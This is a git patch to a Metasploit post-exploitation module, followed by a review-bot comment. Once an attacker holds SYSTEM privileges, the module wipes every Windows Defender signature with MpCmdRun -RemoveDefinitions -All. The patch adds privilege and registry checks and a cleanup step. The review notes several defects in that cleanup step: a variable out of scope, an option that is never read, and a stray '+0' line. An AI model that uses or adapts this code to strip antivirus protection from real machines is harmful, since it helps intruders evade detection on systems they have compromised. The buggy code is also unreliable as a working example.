From 1304f93f1f9e0186a3c6d93c40eaca37fa12aaac Mon Sep 17 00:00:00 2001
From: bwatters-r7
Date: Thu, 29 Nov 2018 10:39:46 -0600
Subject: [PATCH] Add more checks and a cleanup function
---
 .../disable_windowsdefender_signatures.rb | 38 ++++++++++++++++---
 1 file changed, 33 insertions(+), 5 deletions(-)
diff --git a/modules/post/windows/manage/disable_windowsdefender_signatures.rb b/modules/post/windows/manage/disable_windowsdefender_signatures.rb
index c8faa3d638..013e32edbd 100644
--- a/modules/post/windows/manage/disable_windowsdefender_signatures.rb
+++ b/modules/post/windows/manage/disable_windowsdefender_signatures.rb
@@ -6,6 +6,7 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Registry
   def initialize(info={})
     super( update_info( info,
@@ -24,16 +25,43 @@ class MetasploitModule < Msf::Post
       'Platform' => [ 'win' ],
       'SessionTypes' => [ 'meterpreter' ],
     ))
+    register_options(
+      [
+        OptBool.new('AUTO_CLEANUP', [ true, 'Attempt to return protections after session exit', true ])
+      ])
+
   end
   def run
-    unless is_system?()
-      print_status("Remove Definitions Windows Defender")
-      file_path = "C:\\Program Files\\Windows Defender\\MpCmdRun.exe"
-      if exist?(file_path)
-        cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -RemoveDefinitions -All")
+    #Are we system?
+    if not is_system?()
+      fail_with(Failure::NoAccess, "You must be System to run this Module")
+    end
+    #Is the binary there?
+    program_path = session.sys.config.getenv('ProgramFiles')
+    vprint_status("program_path = #{program_path}")
+    file_path = program_path + '\Windows Defender\MpCmdRun.exe'
+    vprint_status("file_path = #{file_path}")
+    if not exist?(file_path)
+      fail_with(Failure::NoAccess, "#{file_path} is not Present")
+    end
+    #Is defender even enabled?
+    defender_disable_key = "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"
+    disable_key_value = meterpreter_registry_getvalinfo(defender_disable_key, "DisableAntiSpyware", REGISTRY_VIEW_NATIVE)
+    if disable_key_value.nil? || disable_key_value != 1
+      print_status("Removing All Definitions for Windows Defender")
+      cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -RemoveDefinitions -All")
+      if cmd.include?('denied')
+        print_bad("#{cmd}")
+      else
         print_status("#{cmd}")
       end
+    else
+      fail_with(Failure::BadConfig, "Defender is not Enabled")
     end
   end
+  def cleanup
+    cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -SignatureUpdate")
+  end
 end
+0
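Review bot: The new `cleanup` method references `file_path`, which is a local variable inside `run`, so the signature-restore path raises NameError and protections are never re-enabled; store it as an instance variable in `run` (`@file_path = program_path + '\Windows Defender\MpCmdRun.exe'`) and use `@file_path` in `cleanup`. The `AUTO_CLEANUP` option registered in `initialize` is never read, so the restore runs unconditionally regardless of the operator's choice; guard it with `return unless datastore['AUTO_CLEANUP']` at the top of `cleanup`. The `cmd` local in `cleanup` is assigned and discarded, so a failed `-SignatureUpdate` is silent; print it the same way `run` does so the output shows whether protections actually came back. The trailing `+0` line after the class `end` looks like an accidental keystroke and should be dropped.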